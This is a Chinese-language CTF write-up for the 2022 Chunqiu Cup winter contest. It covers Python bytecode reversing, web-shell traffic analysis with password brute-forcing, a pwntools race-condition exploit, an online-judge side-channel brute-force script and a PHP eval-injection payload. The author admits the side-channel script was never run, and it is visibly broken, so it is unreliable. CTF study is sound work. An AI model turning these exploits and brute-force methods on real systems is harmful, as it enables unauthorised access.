2022春秋杯冬季赛wp - S1gMa

前言

第一次参加春秋杯冬季赛，想了想还是得把 $Wp$ 给补上，虽然没有拿奖，但也算是学到了好多东西，交互还是近几次比赛学会的。（简单来说就是这次比赛题没一道见过熟悉的www......)

由于是赛后才补的题解，所以有些在线交互的没截上图就口糊下好了。

下面是个人排名（轻点骂 >_<）：

Reverse

Easy_python ( 解法1 ）

题目大意：

逆向 $Python$ 字节码:

  3           0 LOAD_CONST               1 (204)
              3 LOAD_CONST               2 (141)
              6 LOAD_CONST               3 (44)
              9 LOAD_CONST               4 (236)
             12 LOAD_CONST               5 (111)
             15 LOAD_CONST               6 (140)
             18 LOAD_CONST               6 (140)
             21 LOAD_CONST               7 (76)
             24 LOAD_CONST               3 (44)
             27 LOAD_CONST               8 (172)
             30 LOAD_CONST               9 (7)
             33 LOAD_CONST               9 (7)
             36 LOAD_CONST              10 (39)
             39 LOAD_CONST              11 (165)
             42 LOAD_CONST              12 (70)
             45 LOAD_CONST               9 (7)
             48 LOAD_CONST              10 (39)
             51 LOAD_CONST              13 (166)
             54 LOAD_CONST              11 (165)
             57 LOAD_CONST              14 (134)
             60 LOAD_CONST              14 (134)
             63 LOAD_CONST               6 (140)
             66 LOAD_CONST               1 (204)
             69 LOAD_CONST              11 (165)
             72 LOAD_CONST               9 (7)
             75 LOAD_CONST              10 (39)
             78 LOAD_CONST              15 (230)
             81 LOAD_CONST               6 (140)
             84 LOAD_CONST              11 (165)
             87 LOAD_CONST              12 (70)
             90 LOAD_CONST               3 (44)
             93 LOAD_CONST               8 (172)
             96 LOAD_CONST              16 (102)
             99 LOAD_CONST              17 (6)
            102 LOAD_CONST               6 (140)
            105 LOAD_CONST               1 (204)
            108 LOAD_CONST              15 (230)
            111 LOAD_CONST              15 (230)
            114 LOAD_CONST               7 (76)
            117 LOAD_CONST              18 (198)
            120 LOAD_CONST              19 (38)
            123 LOAD_CONST              20 (175)
            126 BUILD_LIST              42
            129 STORE_FAST               0 (flag)

  4         132 SETUP_LOOP              54 (to 189)
            135 LOAD_GLOBAL              0 (range)
            138 LOAD_CONST              21 (42)
            141 CALL_FUNCTION            1
            144 GET_ITER            
        >>  145 FOR_ITER                40 (to 188)
            148 STORE_FAST               1 (i)

  5         151 LOAD_FAST                0 (flag)
            154 LOAD_FAST                1 (i)
            157 BINARY_SUBSCR       
            158 LOAD_CONST              22 (5)
            161 BINARY_RSHIFT       
            162 LOAD_FAST                0 (flag)
            165 LOAD_FAST                1 (i)
            168 BINARY_SUBSCR       
            169 LOAD_CONST              23 (3)
            172 BINARY_LSHIFT       
            173 BINARY_OR           
            174 LOAD_CONST              24 (255)
            177 BINARY_AND          
            178 LOAD_FAST                0 (flag)
            181 LOAD_FAST                1 (i)
            184 STORE_SUBSCR        
            185 JUMP_ABSOLUTE          145
        >>  188 POP_BLOCK           
        >>  189 LOAD_CONST               0 (None)
            192 RETURN_VALUE        

以前完全没有学过 $Python$ 字节码，就算是看道了也就直接跳过了，但这种题见了不止一次了，所以直接比赛期间现学字节码手撸源代码。

解题过程

首先了解字节码中几个关键命令的作用，官方文档如下：

dis — Disassembler for Python bytecode

同时有各个参数的所在意义：

源码行号 | 指令在函数中的偏移 | 指令符号 | 指令参数 | 实际参数值

其中我们拿出本题要用的东西：

GET_ITER
	Implements TOS = iter(TOS).

BINARY_SUBSCR
  	Implements TOS = TOS1[TOS].

BINARY_LSHIFT
	Implements TOS = TOS1 << TOS.

BINARY_RSHIFT
	Implements TOS = TOS1 >> TOS.

BINARY_OR
	Implements TOS = TOS1 | TOS.

BINARY_AND
	Implements TOS = TOS1 & TOS.

通俗来讲，字节码就是以栈为基础的运行过程，故只需要用先进先出的思想进行模拟还原即可。

当然，也可以利用输出调试来一步一步还原（对于我这种现场学手撸的人非常友好） $cmd$ 下命令行输入：

python -m dis ./XX.py

即可得到此份的字节码（本题还原如下）：

flag = [204,141,44,236,111,140,140,76,44,172,7,7,39,165,70,7,39,166,165,134,134,140,204,165,7,39,230,140,165,70,44,172,102,6,140,204,230,230,76,198,38,175]
for i in range(42):
    f1ag = ((flag[i] >> 5) | (flag[i] << 3 )) & 255
    print(chr(f1ag),end="")

Easy_python ( 解法2 ）

用 $Chatgpt$ 秒了。 （ 比赛结束后看大佬的 $Wp$ 知道的，太神仙了www）

Misc

reindeer game

解题过程

纯纯签到题，拼手速和运气，玩游戏控制麋鹿找到30个姜饼人即可得到 $flag$ 。

调查问卷

解题过程

拼手速。

nan's analysis

(第一次见）

解题过程

本题只在比赛中保留了部分截图，凑合凑合吧。

分析流量，可知是个 $web$ 浏览日志和一个 $shell$ 的压缩包。

首先 $binwalk$ 分离日志和压缩包并且修复，可以得知，存在一个 $shell.php$ 分析 $js$ 发下是个零宽隐写，解密后得到压缩包密码和 $root$ 的密码提示。

得到密码提示后，可以考虑进行字典爆破，需要自己写一个代码生成字典：

list=[0,1,2,3,4,5,6,7,8,9]
for i in list:
    for k in list:
        for l in list:
            print((str(i)+str(k)+str(i)+str(l))*4)

然后得到密码为: $05040504050405040504$

之后在 $/var/www/html/install$ 中可以执行命令：$cat$ $.index.php$ 可得到被混淆后的一串 $php$ 代码, 并且得到两个提示：此代码被加密了、$root$ 密码经过 $AES$ 加密。

然后就根据提示开始解加密代码，是个 $php$ 混淆，解密网站如下：

php 解混淆

得到加密后的密码，同时再次回到流量分析可以在压缩包和图片上传的地方得到个 $PASS$ $keyisChunqiuGame00504$，结合前面的提示解出 $root$ 密码：
AES解密

最后登录 $root$ 可得到 $flag$。

PWN

work_pwn

解题过程

分析代码可以发现，是个条件竞争会将读入的 $filename$ 强制改名，此时会执行 $sleep(1)$

因此找到入手点，将 $name$ 修改成 $/flag$ 发送上去，着手写 $code$ :

from pwn import *
context(arch="amd64",os="linux")
context.log_level = "debug"

io1 = remote('39.106.48.123',42877)

io1.sendline(str(3))
io1.sendline(str(1))
io1.recv()

sleep(0.1)
io1.sendline(str(1))
io1.sendline(str(1))
io1.recvuntil("Input Name : ")
io1.sendline(b'./flag'+2*b'\x00')
sleep(1)
io1.recv()

Online_judge

(第一次见）

解题过程

(此题为赛后复现，被大佬指点）

题目提示 $flag$ 在 $/flag/flag$ 中。

侧信道，test只有一个测试用例，返回的3，可以通过侧信道爆破。

侧信道爆破类似于 $web$ 中的盲注，逐个爆破 $flag$ ,需要写入一段 $shellcode$来判断爆破的flag是否正确，这里要用到汇编中的jz或者使用二分法，ja来判断，不正确就直接停止。

题目原请求如下：

import os
import sys
import requests
host,port = '47.104.129.38',10101
base_url = f'http://{host}:{port}'
token_url = f'{base_url}/getToken'
judge_url = f'{base_url}/judge'
def getToken():
    result = requests.post(token_url).json()
    #print(result)
    assert not result['error'], "System error"
    return result['data']['token']
def judge(chall:str, src:str, language:str = 'C'):
    data = {
        'src': src,
        'language': language,
        'action': chall,
        'token': token,
    }
    result = requests.post(judge_url, json = data).json()
    print(result)
    return True
token = getToken()
print(token)

py_src = open('./solve.py').read()
judge('test', py_src, 'PYTHON')

flag = 'flag{'
for i in range(len(flag),100):
    head = 0
    tail = 127
    mid = (tail + head) << 1
    while head < tail:
        py_src = open('./solve.py').read()
        Read = judge('test', py_src, 'PYTHON')
        if Read['data']=='SUCCESS':
            head = mid + 1
        else:
            tail = mid
        mid = (head + tail) >> 1
    flag += chr(left)
    info(flag)
    if flag[-1] == "}":
        break
print(flag)

没机会跑了，有一说一我也不知道对不对（要是不对的话，就当他不存在好了，思路没啥问题，代码估计是错的，第一次写这东西），对照着大佬的某 $PWN$ 的 $shellcode$ 侧信道攻击思路写的。

大佬博客

Web

ezphp

解题过程

源码如下：

<?php  
highlight_file(__FILE__);  
$num = $_GET['num'];  
if(is_string($num) && strlen($num) < 5 && strpos($num,'111') === false && strpos($num,'0') === false && eval("return 111===${num};")){    readfile('/flag');  
}  
  
?>

提示：高版本 $php$ 特性

因为return (111===1) or 1

所以 ?num=1|1

$payload$ 构造方法还有很多。

结语

这篇文章就以它来结尾吧(>_<):

子曰：“默而识之，学而不厌，诲人不倦，何有于我哉？”——《论语·述而》

小声说：今天是圣诞节，所以......Merry Christmas🎄~